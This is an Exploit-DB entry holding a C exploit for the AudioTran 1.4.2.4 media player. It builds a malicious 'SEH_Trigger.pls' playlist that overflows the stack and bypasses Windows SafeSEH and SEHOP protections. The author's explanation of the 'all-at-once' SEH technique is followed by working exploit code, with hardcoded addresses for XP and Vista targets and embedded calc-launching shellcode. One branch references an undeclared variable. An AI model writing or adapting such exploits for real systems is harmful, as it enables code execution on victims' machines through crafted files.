AudioTran 1.4.2.4 - SafeSEH + SEHOP

EDB-ID:

15184

CVE:



Author:

x90c

Type:

local


Platform:

Windows

Date:

2010-10-02


/*
# Exploit Title: AudioTran SafeSEH+SEHOP all-at-once attack method exploit
# Date: 2010.10.1
# Author: x90c
# Version: 1.4.2.4
# Tested on:
#    - MS Win xp sp3 pro ko ( SafeSEH )
#    - MS Win xp sp3 pro en ( SafeSEH )
#    - MS Win Vista ultimate sp0 ko ( SafeSEH )
#    - MS Win Vista ultimate sp1 ko ( SafeSEH + SEHOP enabled )
# CVE :
*/

/*
  //--
  AudioTran 1.4.2.4 SafeSEH+SEHOP *all at once* SEH attack method exploit 
  ( 
    SafeSEH+SEHOP all at once bypass attack, 
    no 'pop pop ret' and 'xor pop pop ret' techniques 
  )
  //--

  Description:
    I made a new attack techinque to exploit SafeSEH+SEHOP protection all at once after research SEH.
    And I applied the new method on AudioTran vulnerability for case by case exploit.
  
  David Litchfield Published 
    'Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server.' 
    Technical paper on 2003 ( SafeSEH bypass techniques ).
    - http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf
  
  SYSDREAM Published 'Bypassing SEHOP' article:
    - http://www.sysdream.com/articles/sehop_en.pdf

  This new all-at-once SEH attack techinque applied to bypassing the SafeSEH+SEHOP protection:
    Vista sp1, Win 7, Win Server 2008, Win Server 2008 R2 supports SEHOP Protection.
    And Only under Win 2008 Servers it enables by deafult. so I manualy enables SEHOP
    On vista sp1 by using fixitup tool which below link contains. then applied my new technique.
    - http://support.microsoft.com/kb/956607
  
  Referenced exploits:
    SafeSEH/DEP bypass exploit: Muhamad Fadzil Ramli
    exploit for XP SP3 ( David Litchfield's SafeSEH bypass, ROP to bypass DEP )
    - http://www.exploit-db.com/exploits/15047/
  
    Credit/exploit: Abhishek Lyall
    exploit for XP SP2 ( SEH overwrite )
    - http://www.exploit-db.com/exploits/14961/ ( Abhishek Lyall )

  Tested Platforms:
    - MS Win xp sp3 pro ko ( SafeSEH )
    - MS Win xp sp3 pro en ( SafeSEH )
    - MS Win Vista ultimate sp0 ko ( SafeSEH )
    - MS Win Vista ultimate sp1 ko ( SafeSEH + SEHOP enabled )

  Screenshots:
    - http://www.x90c.org/All_at_Once_SEH_attack/win xp sp3_pro_en_SafeSEH.png
    - http://www.x90c.org/All_at_Once_SEH_attack/win xp sp3_pro_ko_SafeSEH.png
    - http://www.x90c.org/All_at_Once_SEH_attack/win vista sp0 Ultimate_ko_SafeSEH.png
    - http://www.x90c.org/All_at_Once_SEH_attack/win vista sp1 Ultimate_ko_SafeSEH_SEHOP_bypass.png

  Presentation URL: http://www.x90c.org/SEH all-at-once attack.pdf
  exploit URL: http://www.x90c.org/All_at_Once_SEH_attack/audiotran_safeseh_sehop_exploit(SEH_all-at-once_attack).c.txt

  p.s: This vulnerability doesn't needed any SEH attack, because it works like 
       A classical stackoveflow. anyway I used it for applying a new technique.
       
       After research and writing this exploit without the litchfield method,
       I found originaly similar SafeSEH bypass method(registered exception handler approach) 
       Introduced in the above David Litchfield's Technical Paper. 
       The litchfield method applies only for SafeSEH bypass. 
       My attack method can applys SafeSEH+SEHOP bypass *all at once*.

  ******* SafeSEH+SEHOP all at once attack method *******:
  [1] Looking for *_SafeSEH_allowed_modules!_except_handler3.
  [2] overwrite SEH E_R struct as below.

        |E_R *Next | Exception Handler | an base address of Image area |  index to user-defined handler |
        -------------------------------------------------------------------------------------------------
        |orig *Next| *!_except_handler3| calculated value 1(ind_useh1) | calculated value 2(ind_useh2)  |
    
    - ind_useh1 is a base address of The vulnerable application's Image area for callling user-defined
      SEH Exception Handler. And ind_useh2 is the '__try{}' area count from zero(0)...
      If '__try{ __try{' then the [ebp-4] (ind_useh2) is 1. '__try{ __try{ __ try{' (ind_useh2) is 2.

    - the two values ind_useh1, ind_useh2 will calculated for a user-defined exception handler address
      For each '__try{'. *allowed_modules!_except_handler3(compiler generated handler) which calls 
      User-defined handler. as you may know, attacker can control those two values and make 
      A indirect call to shellcode.

    - SafeSEH(ExceptionHandler Validation) allows allowed *Modules!_except_handler3 
      Then it bypassed. newer *all-at-once attack is some different than David Litchfield's Approach.

      SEHOP doesn't allow overwriting the value '\xeb\x06 ( jmp short $+6 )' to E_R struct *Next.
      If overwrited by other value than original E_R *next. than ChainValidation failed.
      My attack method doesn't changes the original *next value. and SEHOP(Chain validation) bypassed. 
      _except_handler3 changed to _except_handler4 Under SEHOP applied platforms. but still exists 
      _except_handler3 on some modules and other same codes like MSVBVM60!CreateIExprSrvObj+??. ( x90c )

    - On some cases ind_useh1, ind_useh2 locations are changed as this AudioTran SEH.
      But it doesn't matter to exploit.
	  
        ( AudioTran SEH )
	|E_R *Next| ExceptionHandler | ind_useh2 | ind_useh1 |

  [3] seizes the values ind_useh1 and ind_useh2 for making a indirect callling to shellcode.

  --
  x90c ( KyongJoo, Jung ) of INetCop(c) Security.
  Personal homepage: http://www.x90c.org
  E-mail: geinblues@gmail.com
  --

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pls_head[] = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0D\x0A\x46\x69\x6C\x65\x31\x3D";
                        
// -- payload chunks for each platforms.
char pre_nop[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

char xp_sp3_pre[] = "\x76\xe6\x12\x00"; // &next 4 ( 0012e676 ) -------+
char vista_sp0_pre[] = { // +0x64 stored address will called.          |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//   |
"\x90\x90\x90\x90"        //                                           |
"\x76\xe6\x12\x00" }; // &next 4: vista ultimate sp0 ko: 0012e676-+    |
                          //                                      |    |
char calc_shellcode[] = { // from Abhishek Lyall's exploit.  <----+----+
"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"           
"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
"\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
"\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
"\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
"\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
"\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93"
"\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65"
"\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45"
"\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57"
"\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4"
"\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D"
"\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46"
"\x9B\x70\x5F\xED\x1B\x12\x9F" };

char trap_shellcode[] = "\xcc\xcc\xcc\xcc";
char crasher[] = "\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43";

// --

static char platforms[5][128] = {
  "\t- 0: MS Win xp pro sp3 ko ( SafeSEH )\n", 
  "\t- 1: MS Win xp pro sp3 en ( SafeSEH )\n",
  "\t- 2: MS Win Vista Ultimate sp0 ko ( SafeSEH )\n",
  "\t- 3: MS Win Vista Ultimate sp1 ko ( SafeSEH + SEHOP )\n",
  "\0" };

int main(int argc, char *argv[])
{
  char xp_sp3_payload[sizeof(pls_head)+276+sizeof(pre_nop)+sizeof(xp_sp3_pre)+sizeof(calc_shellcode)];
  char vista_sp0_payload[sizeof(pls_head)+276+sizeof(pre_nop)+sizeof(vista_sp0_pre)+sizeof(calc_shellcode)];
  char vista_sp1_SEHOP_payload[sizeof(pls_head)+sizeof(trap_shellcode)+284];
  short target = 0;
  long ind = 0;
  FILE *fp;

  printf("--\n");
  printf("AudioTran SafeSEH+SEHOP all-at-once attack exploit ( no 'pop pop ret' technique )\n");
  printf("x90c (KyongJoo, Jung)\n\n");
  printf("--\n");
  printf("Usage: %s [target]\n", argv[0]);
  printf("%s%s%s%s\n", platforms[0], platforms[1], platforms[2], platforms[3]);

  if(argc < 2)
    exit(1);

  target = atoi(argv[1]);

  fp = fopen("SEH_Trigger.pls", "wb");

  ind = sizeof(pls_head) - 1;

  /* TARGET: XP sp3 ko, en SafeSEH */
  if(target == 0 || target == 1){
    memcpy(&xp_sp3_payload, &pls_head, sizeof(pls_head));
    memset(&xp_sp3_payload[ind], 'A', 260);
    *(long *)&xp_sp3_payload[ind+=260] = 0x0012e600; // original E_R *next

    if(target == 0) // xp sp3 ko
      *(long *)&xp_sp3_payload[ind+=4] = 0x7345bafd; // *windows_module!_except_handler3
    else if(target == 1) // xp sp3 ko
      *(long *)&xp_sp3_payload[ind+=4] = 0x7350bafd; // *windows_module!_except_handler3

    *(long *)&xp_sp3_payload[ind+=4] = 0x0012e604; // ind_useh
    *(long *)&xp_sp3_payload[ind+=4] = 0x00000009; // ind_useh1
    memcpy(&xp_sp3_payload[ind+=4], &pre_nop, sizeof(pre_nop)); 
    memcpy(&xp_sp3_payload[ind+=(sizeof(pre_nop)-1)], &xp_sp3_pre, sizeof(xp_sp3_pre)); 
    memcpy(&xp_sp3_payload[ind+=(sizeof(xp_sp3_pre)-1)], &calc_shellcode, sizeof(calc_shellcode));
    ind+=sizeof(calc_shellcode);
    fwrite(&xp_sp3_payload, 1, ind - 1, fp);
  } 
  /* TARGET: Vista sp0 ko SafeSEH */
  else if(target == 2) {
    memcpy(&vista_sp0_payload, &pls_head, sizeof(pls_head));
    memset(&vista_sp0_payload[ind], 'A', 260);
    *(long *)&vista_sp0_payload[ind+=260] = 0x0012e658; // original E_R *next
    *(long *)&vista_sp0_payload[ind+=4] = 0x7338ba2d; // *windows_module!_except_handler3
    *(long *)&vista_sp0_payload[ind+=4] = 0x0012e602; // ind_useh
    *(long *)&vista_sp0_payload[ind+=4] = 0x00000009; // ind_useh1
    memcpy(&vista_sp0_payload[ind+=4], &pre_nop, sizeof(pre_nop));
    memcpy(&vista_sp0_payload[ind+=(sizeof(pre_nop)-1)], &vista_sp0_pre, sizeof(vista_sp0_pre));
    memcpy(&vista_sp0_payload[ind+=(sizeof(vista_sp0_pre)-1)], &calc_shellcode, sizeof(calc_shellcode));    
    ind+=sizeof(calc_shellcode);
    fwrite(&vista_sp0_payload, 1, ind - 1, fp);
  } 
  /* TARGET: Vista sp1 ko SafeSEH + SEHOP */
  else if(target == 3){
    memcpy(&vista_sp1_SEHOP_payload, &pls_head, sizeof(pls_head));
    memcpy(&vista_sp1_SEHOP_payload[ind], _shellcode, 4); // trap_shellcode
    memset(&vista_sp1_SEHOP_payload[ind+=4], 'A', 150);
    *(long *)&vista_sp1_SEHOP_payload[ind+=150] = 0x0012e4d8; // &trap_shellcode
    memset(&vista_sp1_SEHOP_payload[ind+=4], 'B', 102);
    *(long *)&vista_sp1_SEHOP_payload[ind+=102] = 0x0012e640; // original E_R *next
    *(long *)&vista_sp1_SEHOP_payload[ind+=4] = 0x7278bafd; // MSVBVM60!CreateIExprSrvObj+??
    *(long *)&vista_sp1_SEHOP_payload[ind+=4] = 0x0012e504; // ind_useh
    *(long *)&vista_sp1_SEHOP_payload[ind+=4] = 0x00000009; // ind_useh1
    memcpy(&vista_sp1_SEHOP_payload[ind+=4], &crasher, sizeof(crasher)); // crasher
    ind+=sizeof(crasher);
    fwrite(&vista_sp1_SEHOP_payload, 1, ind - 1, fp);
  }
  
  fclose(fp);  

  printf("[+] Target: %s", platforms[target]);
  printf("[+] 'SEH_Trigger.pls' file created!\n\n");

  return 0;
}